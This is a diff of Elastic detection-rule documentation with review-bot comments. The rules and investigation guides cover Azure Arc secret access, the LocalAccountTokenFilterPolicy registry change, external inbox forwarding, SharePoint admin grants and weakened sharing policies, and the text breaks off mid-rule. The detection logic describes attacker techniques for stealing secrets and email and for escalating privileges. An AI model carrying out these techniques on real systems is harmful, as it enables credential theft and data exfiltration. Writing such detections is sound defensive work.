@@ -0,0 +1,141 @@ +[[prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy]] +=== Kubernetes Secret or ConfigMap Access via Azure Arc Proxy + +Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 9m + +*Searches indices from*: now-5d ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect +* https://microsoft.github.io/Threat-Matrix-for-Kubernetes/ +* https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence +* https://cloud.google.com/blog/topics/threat-intelligence/escalating-privileges-azure-kubernetes-services +* https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-3-from-compromis + +*Tags*: + +* Data Source: Kubernetes +* Domain: Kubernetes +* Domain: Cloud +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide 
+ + + +*Triage and analysis* + + + +*Investigating Kubernetes Secret or ConfigMap Access via Azure Arc Proxy* + + +When Kubernetes operations are performed through Azure Arc Cluster Connect, the K8s audit log shows the Arc AAD proxy +service account as the authenticated user, with the actual Azure AD identity in the `impersonatedUser` field. This +rule detects non-system secret and configmap access — including reads, writes, and deletions — routed through this +proxy path. Read operations (`get`, `list`) are particularly important to detect as they represent the most common +adversary action: exfiltrating secrets without leaving obvious modification traces. + + +*Possible investigation steps* + + +- Check the `kubernetes.audit.impersonatedUser.username` field — this contains the Azure AD object ID of the actual + caller. Cross-reference with Azure AD to identify the service principal or user. +- Review the `kubernetes.audit.impersonatedUser.extra.oid` field for the Azure AD object ID. +- Examine the namespace — operations in `default` or application namespaces are more suspicious than `azure-arc` or + `kube-system`. +- Check the `kubernetes.audit.objectRef.name` — look for suspicious secret/configmap names that don't match known + application resources. +- Correlate with Azure Activity Logs for the same time window to find the `LISTCLUSTERUSERCREDENTIAL` operation that + initiated the Arc proxy session. +- Review Azure Sign-In Logs for the impersonated identity's authentication source IP and geolocation. + + +*Response and remediation* + + +- If the impersonated identity is not recognized, revoke its Azure AD credentials immediately. +- Remove the ClusterRoleBinding or RoleBinding that grants the identity access to secrets/configmaps. +- Rotate any Kubernetes secrets that may have been read or exfiltrated. +- Review the Arc connection and consider disconnecting it if compromised. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index +| WHERE STARTS_WITH(kubernetes.audit.user.username, "system:serviceaccount:azure-arc:") + AND kubernetes.audit.objectRef.resource IN ("secrets", "configmaps") + AND kubernetes.audit.verb IN ("get", "list", "create", "update", "patch", "delete") + AND kubernetes.audit.objectRef.namespace NOT IN ("azure-arc", "azure-arc-release", "kube-system") + AND NOT STARTS_WITH(kubernetes.audit.objectRef.name, "sh.helm.release.v1") + +| STATS + Esql.verb_values = VALUES(kubernetes.audit.verb), + Esql.resource_type_values = VALUES(kubernetes.audit.objectRef.resource), + Esql.resource_name_values = VALUES(kubernetes.audit.objectRef.name), + Esql.namespace_values = VALUES(kubernetes.audit.objectRef.namespace), + Esql.acting_user_values = VALUES(kubernetes.audit.user.username), + Esql.user_agent_values = VALUES(kubernetes.audit.userAgent), + Esql.source_ips_values = VALUES(kubernetes.audit.sourceIPs), + Esql.response_code_values = VALUES(kubernetes.audit.responseStatus.code), + Esql.timestamp_first_seen = MIN(@timestamp), + Esql.timestamp_last_seen = MAX(@timestamp), + Esql.event_count = COUNT(*) + BY kubernetes.audit.impersonatedUser.username + +| WHERE Esql.timestamp_first_seen >= NOW() - 9 minutes +| KEEP * + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Container API +** ID: T1552.007 +** Reference URL: https://attack.mitre.org/techniques/T1552/007/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: 
https://attack.mitre.org/techniques/T1530/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc
new file mode 100644
index 0000000000..96938d5e35
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc
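Review bot: The description states that the acting user is the Arc proxy service account with the real caller in `impersonatedUser`, but the first `WHERE` only requires `STARTS_WITH(kubernetes.audit.user.username, "system:serviceaccount:azure-arc:")` and never requires `kubernetes.audit.impersonatedUser.username` to be present, so direct secret/configmap access by any service account in the `azure-arc` namespace (the Arc agents themselves) also matches and is grouped under a null impersonated user. If the Cluster Connect proxy path is the intent, add `AND kubernetes.audit.impersonatedUser.username IS NOT NULL` to that `WHERE`, or narrow the prefix to the `azure-arc-kube-aad-proxy-sa` account the description names. The verb list omits `watch`, which is also a read path for secrets; either add it or note the omission in the guide. `Esql.response_code_values` is collected but never filtered on, so denied requests alert alongside successful reads — a bullet in "Possible investigation steps" telling the analyst to check the response code before treating the access as a successful read would help triage.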
@@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled]] +=== Local Account TokenFilter Policy Disabled + +Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.registry-* +* logs-windows.sysmon_operational-* +* endgame-* +* logs-sentinel_one_cloud_funnel.* +* logs-m365_defender.event-* +* logs-crowdstrike.fdr* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439 +* https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167 +* https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 318 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. 
+ + +*Investigating Local Account TokenFilter Policy Disabled* + + +The LocalAccountTokenFilterPolicy is a Windows registry setting that, when enabled, allows remote connections from local administrators to use full high-integrity tokens. Adversaries may exploit this to bypass User Account Control (UAC) and gain elevated privileges remotely. The detection rule monitors changes to this registry setting, identifying potential unauthorized modifications that could indicate an attempt to facilitate lateral movement or evade defenses. + + +*Possible investigation steps* + + +- Review the registry event logs to confirm the change to the LocalAccountTokenFilterPolicy setting, specifically looking for entries where the registry.value is "LocalAccountTokenFilterPolicy" and registry.data.strings is "1" or "0x00000001". +- Identify the user account and process responsible for the registry modification by examining the associated event logs for user and process information. +- Check for any recent remote connections to the affected system, focusing on connections initiated by local administrator accounts, to determine if the change was exploited for lateral movement. +- Investigate any other recent registry changes on the host to identify potential patterns of unauthorized modifications that could indicate broader malicious activity. +- Correlate the event with other security alerts or logs from data sources like Elastic Endgame, Elastic Defend, Sysmon, SentinelOne, or Microsoft Defender for Endpoint to gather additional context and assess the scope of the potential threat. +- Assess the system for signs of compromise or malicious activity, such as unusual processes, network connections, or file modifications, that may have occurred around the time of the registry change. + + +*False positive analysis* + + +- Administrative tools or scripts that modify the LocalAccountTokenFilterPolicy for legitimate configuration purposes may trigger alerts. 
To manage this, identify and document these tools, then create exceptions for their known registry changes. +- System updates or patches that adjust registry settings as part of their installation process can cause false positives. Monitor update schedules and correlate alerts with these activities to determine if they are benign. +- Security software or management solutions that enforce policy changes across endpoints might modify this registry setting. Verify these actions with your IT or security team and consider excluding these processes from triggering alerts. +- Custom scripts or automation tasks used for system hardening or configuration management may alter this setting. Review these scripts and whitelist their expected changes to prevent unnecessary alerts. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement. +- Revert the registry setting for LocalAccountTokenFilterPolicy to its default state if it was modified without authorization. +- Conduct a thorough review of recent administrative activities and access logs on the affected system to identify any unauthorized access or changes. +- Reset passwords for all local administrator accounts on the affected system to prevent potential misuse of compromised credentials. +- Deploy endpoint detection and response (EDR) tools to monitor for any further suspicious activities or attempts to modify registry settings. +- Escalate the incident to the security operations center (SOC) for further investigation and to determine if the threat is part of a larger attack campaign. +- Implement additional network segmentation and access controls to limit administrative access to critical systems and reduce the risk of similar threats. 
+ +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + registry.value : "LocalAccountTokenFilterPolicy" and + registry.path : ( + "HKLM\\*\\LocalAccountTokenFilterPolicy", + "\\REGISTRY\\MACHINE\\*\\LocalAccountTokenFilterPolicy", + "MACHINE\\*\\LocalAccountTokenFilterPolicy" + ) and registry.data.strings : ("1", "0x00000001") and + not process.executable : ( + /* Intune */ + "C:\\Windows\\system32\\deviceenroller.exe", + "C:\\Windows\\system32\\omadmclient.exe", + "C:\\Windows\\UUS\\amd64\\MoUsoCoreWorker.exe", + "C:\\Windows\\UUS\\Packages\\Preview\\amd64\\MoUsoCoreWorker.exe", + + /* Crowdstrike specific exclusion as it uses NT Object paths */ + "\\Device\\HarddiskVolume*\\system32\\deviceenroller.exe", + "\\Device\\HarddiskVolume*\\system32\\omadmclient.exe", + "\\Device\\HarddiskVolume*\\UUS\\amd64\\MoUsoCoreWorker.exe", + "\\Device\\HarddiskVolume*\\UUS\\Packages\\Preview\\amd64\\MoUsoCoreWorker.exe" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Pass the Hash +** ID: T1550.002 +** Reference URL: https://attack.mitre.org/techniques/T1550/002/ 
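Review bot: The `not process.executable : (...)` exclusion is path-only and does not verify the binary's signature, so the Intune/USO carve-outs silence the rule for anything reported under those paths; where the data source populates it, pairing the exclusion with `process.code_signature.trusted == true` keeps the same noise out without trusting the path alone, and a comment to that effect above the exclusion list would make the trade-off explicit. The "Response and remediation" step "Revert the registry setting for LocalAccountTokenFilterPolicy to its default state" never says what the default is, although the description notes the value does not exist by default; rewrite it as `- Delete the LocalAccountTokenFilterPolicy value (it is absent by default) or set it to 0, then confirm the change is not reapplied by a management policy.`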
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc
new file mode 100644
index 0000000000..5d55c50b06
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc
@@ -0,0 +1,140 @@ +[[prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created]] +=== M365 Exchange Inbox Forwarding Rule Created + +Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. + +*Rule type*: eql + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide +* https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Domain: Email +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Configuration Audit +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 213 + +*Rule authors*: + +* Elastic +* Gary Blackwell +* Austin Songer +* Marco Pedrinazzi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. 
While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating M365 Exchange Inbox Forwarding Rule Created* + + +Microsoft 365 allows users to create inbox rules to automate email management, such as forwarding messages to another address. While useful, attackers can exploit these rules to secretly redirect emails, facilitating data exfiltration. The detection rule monitors for the creation of such forwarding rules, focusing on successful events that specify forwarding parameters, thus identifying potential unauthorized email redirection activities. + + +*Possible investigation steps* + + +- Review the event details to identify the user account associated with the creation of the forwarding rule by examining the o365.audit.Parameters. +- Check the destination email address specified in the forwarding rule (ForwardTo, ForwardAsAttachmentTo, or RedirectTo) to determine if it is an external or suspicious address. +- Investigate the user's recent activity logs in Microsoft 365 to identify any unusual or unauthorized actions, focusing on event.dataset:o365.audit and event.provider:Exchange. +- Verify if the user has a legitimate reason to create such a forwarding rule by consulting with their manager or reviewing their role and responsibilities. +- Assess if there have been any recent security incidents or alerts related to the user or the destination email address to identify potential compromise. +- Consider disabling the forwarding rule temporarily and notifying the user and IT security team if the rule appears suspicious or unauthorized. + + +*False positive analysis* + + +- Legitimate forwarding rules set by users for convenience or workflow purposes may trigger alerts. Review the context of the rule creation, such as the user and the destination address, to determine if it aligns with normal business operations. 
+- Automated systems or third-party applications that integrate with Microsoft 365 might create forwarding rules as part of their functionality. Identify these systems and consider excluding their associated accounts from the rule. +- Temporary forwarding rules set during user absence, such as vacations or leaves, can be mistaken for malicious activity. Implement a process to document and approve such rules, allowing for their exclusion from monitoring during the specified period. +- Internal forwarding to trusted domains or addresses within the organization might not pose a security risk. Establish a list of trusted internal addresses and configure exceptions for these in the detection rule. +- Frequent rule changes by specific users, such as IT administrators or support staff, may be part of their job responsibilities. Monitor these accounts separately and adjust the rule to reduce noise from expected behavior. + + +*Response and remediation* + + +- Immediately disable the forwarding rule by accessing the affected user's mailbox settings in Microsoft 365 and removing any unauthorized forwarding rules. +- Conduct a thorough review of the affected user's email account for any signs of compromise, such as unusual login activity or unauthorized changes to account settings. +- Reset the password for the affected user's account and enforce multi-factor authentication (MFA) to prevent further unauthorized access. +- Notify the user and relevant IT security personnel about the incident, providing details of the unauthorized rule and any potential data exposure. +- Escalate the incident to the security operations team for further investigation and to determine if other accounts may have been targeted or compromised. +- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further suspicious activity or rule changes. 
+- Review and update email security policies and configurations to prevent similar incidents, ensuring that forwarding rules are monitored and restricted as necessary. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +web where + event.provider == "Exchange" and + event.action in ("New-InboxRule", "Set-InboxRule") and + event.outcome == "success" and + ( + (?o365.audit.Parameters.ForwardTo != null and not endsWith~(?o365.audit.Parameters.ForwardTo, user.domain)) or + (?o365.audit.Parameters.ForwardAsAttachmentTo != null and not endsWith~(?o365.audit.Parameters.ForwardAsAttachmentTo, user.domain)) or + (?o365.audit.Parameters.ForwardingAddress != null and not endsWith~(?o365.audit.Parameters.ForwardingAddress, user.domain)) or + (?o365.audit.Parameters.ForwardingSmtpAddress != null and not endsWith~(?o365.audit.Parameters.ForwardingSmtpAddress, user.domain)) or + (?o365.audit.Parameters.RedirectTo != null and not endsWith~(?o365.audit.Parameters.RedirectTo, user.domain)) or + (?o365.audit.Parameters.RedirectToRecipients != null and not endsWith~(?o365.audit.Parameters.RedirectToRecipients, user.domain)) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Email Collection +** ID: T1114 +** Reference URL: https://attack.mitre.org/techniques/T1114/ +* Sub-technique: +** Name: Email Forwarding Rule +** ID: T1114.003 +** Reference URL: https://attack.mitre.org/techniques/T1114/003/ 
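Review bot: Every branch of the query compares the forwarding target against `user.domain` with `not endsWith~(...)`, so when `user.domain` is not populated on the event the function returns null, `not null` stays null, and the rule silently never fires for that event; if the o365 audit data does not reliably carry `user.domain`, guard each branch, e.g. `(user.domain == null or not endsWith~(?o365.audit.Parameters.ForwardTo, user.domain))`, or state the field dependency in the "Setup" section. The suffix test also has no `@` boundary, so it cannot distinguish the tenant domain from a longer domain that merely ends in the same string; for the SMTP-address parameters `endsWith~(..., concat("@", user.domain))` restores the boundary. The "False positive analysis" bullet about configuring exceptions for "Internal forwarding to trusted domains or addresses" is stale relative to this query, which already skips same-domain targets. The "Possible investigation steps" name only three of the six parameters the query inspects (`ForwardingAddress`, `ForwardingSmtpAddress` and `RedirectToRecipients` are missing), and the title says "Created" while `Set-InboxRule` modifications are matched as well.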
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc
new file mode 100644
index 0000000000..9a3e0a36d8
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc
@@ -0,0 +1,133 @@ +[[prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added]] +=== M365 SharePoint Site Administrator Added + +Identifies when a new SharePoint Site Administrator is added in Microsoft 365. Site Administrators have full control over SharePoint Sites, including the ability to manage permissions, access all content, and modify site settings. Adversaries who compromise a privileged account may add themselves or a controlled account as a Site Administrator to maintain persistent, high-privilege access to sensitive SharePoint data. This technique was notably observed in the 0mega ransomware campaign, where attackers elevated privileges to exfiltrate data and deploy ransom notes across SharePoint sites. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-o365.audit-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/purview/audit-log-activities#site-permissions-activities +* https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/ + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Domain: Identity +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating M365 SharePoint Site Administrator Added* + + +Site Administrators in SharePoint Online have full control over a Site, including the ability to manage permissions, access all content, and configure site-level settings. 
Adversaries who gain access to a privileged account may assign Site Administrator rights to maintain persistent access or facilitate data exfiltration. The `SiteCollectionAdminAdded` audit event is logged when this privilege is granted. + + +*Possible Investigation Steps* + + +- Review the `user.id` field to determine who performed the action. Assess whether this user normally manages SharePoint site permissions. +- Examine the `o365.audit.ModifiedProperties.SiteAdmin.NewValue` field to identify the account that was granted Site Administrator privileges. +- Check the `o365.audit.SiteUrl` or `url.original` to determine which Site was targeted. Assess the sensitivity of the data stored in this site. +- Review the `o365.audit.TargetUserOrGroupName` and `o365.audit.TargetUserOrGroupType` fields for additional context on the target principal. +- Pivot to sign-in logs for the acting account to look for anomalies such as logins from unfamiliar locations, devices, or IP ranges. +- Investigate whether the newly added admin account has performed subsequent actions such as file downloads, permission changes, or sharing link creation. +- Check for other recent `SiteCollectionAdminAdded` events to determine if multiple Sites were targeted in a short time frame, which may indicate bulk privilege escalation. + + +*False Positive Analysis* + + +- Routine SharePoint administration tasks by IT teams may trigger this alert. Correlate with change management tickets or scheduled maintenance windows. +- Automated provisioning tools that assign Site admin roles during site creation or migration workflows may generate expected alerts. +- Organizational changes such as team transitions or restructuring may involve legitimate Site admin reassignments. + + +*Response and Remediation* + + +- If the admin addition is unauthorized, immediately remove the Site Administrator role from the suspicious account. 
+- Reset credentials for both the account that performed the action and the account that was added, especially if compromise is suspected. +- Review recent activity on the affected Site for signs of data exfiltration, permission changes, or content modifications. +- Enable or verify enforcement of MFA for all accounts with SharePoint administrative privileges. +- Audit the list of Site Administrators across all Sites to identify any other unauthorized additions. +- Consider implementing Privileged Access Management (PAM) or Privileged Identity Management (PIM) to require just-in-time elevation for SharePoint admin roles. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit + and event.provider:(SharePoint or OneDrive) + and event.category:web + and event.action:SiteCollectionAdminAdded + and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ 
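Review bot: The investigation guide never asks the analyst to compare the actor with the target, although the behaviour the description warns about is an attacker adding *themselves* as Site Administrator; the case where the acting `user.id` resolves to the same principal as `o365.audit.ModifiedProperties.SiteAdmin.NewValue` is the highest-signal variant and deserves its own triage step. Suggest adding under *Possible Investigation Steps*: `- Compare the acting account with the account in o365.audit.ModifiedProperties.SiteAdmin.NewValue; a self-grant, or a grant to a recently created or external account, matches the adversary pattern described above and should be escalated.` The *False Positive Analysis* also lists automated provisioning tools as expected noise, yet the query has no exclusion hook for them, so a tuning sentence such as `Add a rule exception keyed on user.id for provisioning service principals once they are confirmed legitimate.` would make that section actionable rather than descriptive.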
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc
new file mode 100644
index 0000000000..91117744a9
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc
@@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened]] +=== M365 SharePoint Site Sharing Policy Weakened + +Identifies when a SharePoint or OneDrive site sharing policy is changed to weaken security controls. The SharingPolicyChanged event fires for many routine policy modifications, but this rule targets specific high-risk transitions where sharing restrictions are relaxed. This includes enabling guest sharing, enabling anonymous link sharing, making a site public, or enabling guest user access. Adversaries who compromise administrative accounts may weaken sharing policies to exfiltrate data to external accounts or create persistent external access paths. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-o365.audit-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/purview/audit-log-activities#site-administration-activities +* https://learn.microsoft.com/en-us/purview/audit-log-sharing +* https://learn.microsoft.com/en-us/sharepoint/turn-external-sharing-on-or-off + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating M365 SharePoint Site Sharing Policy Weakened* + + +This rule detects when SharePoint or OneDrive sharing policies are modified to weaken security controls. 
The `SharingPolicyChanged` event captures modifications to site-level sharing settings stored in `ModifiedProperties`, where the setting name is a dynamic field key and `OldValue`/`NewValue` track the transition. This rule targets specific transitions that represent a security posture degradation. Note that Microsoft uses inconsistent keyword value formats across settings, some use `True`/`False` while others use `Enabled`/`Disabled`. + + +*Possible Investigation Steps* + + +- Identify the user who performed the change via `user.id` and determine if they have a legitimate administrative role. +- Check if the acting user is a service principal (e.g., `ServiceOperator`, `app@sharepoint`) or a human account. Service principal changes may indicate automated processes or compromised application credentials. +- Review which specific setting was changed by examining the `o365.audit.ModifiedProperties.*` fields: + - ShareWithGuests: Guest/external sharing was enabled on the site. External users can now be invited to access content. + - ShareUsingAnonymousLinks: Anonymous "Anyone" link sharing was enabled. Content can now be shared via unauthenticated links. + - IsPublic: The site or group was changed from private to public visibility. + - AllowGuestUser: Guest user access was enabled for the site. + - AllowFederatedUsers: Federated (external organization) user access was enabled. + - AllowTeamsConsumer: Teams personal account (consumer) user access was enabled. +- Identify the affected site via `o365.audit.ObjectId` (the site URL) and assess the sensitivity of its content. +- Review Azure AD / Entra ID sign-in logs for the acting account to check for authentication anomalies (unusual location, device code flow, new device). +- Look for subsequent sharing activity on the same site — `SharingSet`, `AnonymousLinkCreated`, `SharingInvitationCreated`, or file download events shortly after the policy change. 
+- Determine if the change was part of a planned change request or occurred outside of normal change windows. + + +*False Positive Analysis* + + +- IT administrators enabling external sharing for legitimate collaboration needs. Correlate with change management tickets or Slack/Teams messages. +- Automated provisioning scripts that configure sharing settings during site creation. These typically use service principal accounts with predictable patterns. +- Microsoft service operations (`ServiceOperator`) may modify settings as part of tenant-level policy propagation. + + +*Response and Remediation* + + +- If the change is unauthorized, immediately revert the sharing policy to its previous restrictive state. +- Revoke sessions and reset credentials for the compromised account. +- Review what content was accessed or shared after the policy change using `FileAccessed`, `FileDownloaded`, and sharing audit events. +- Audit all sites for similar unauthorized sharing policy changes. +- Implement Conditional Access policies to restrict administrative actions to trusted networks and compliant devices. +- Enable Privileged Identity Management (PIM) for SharePoint administrator roles to enforce just-in-time access. 
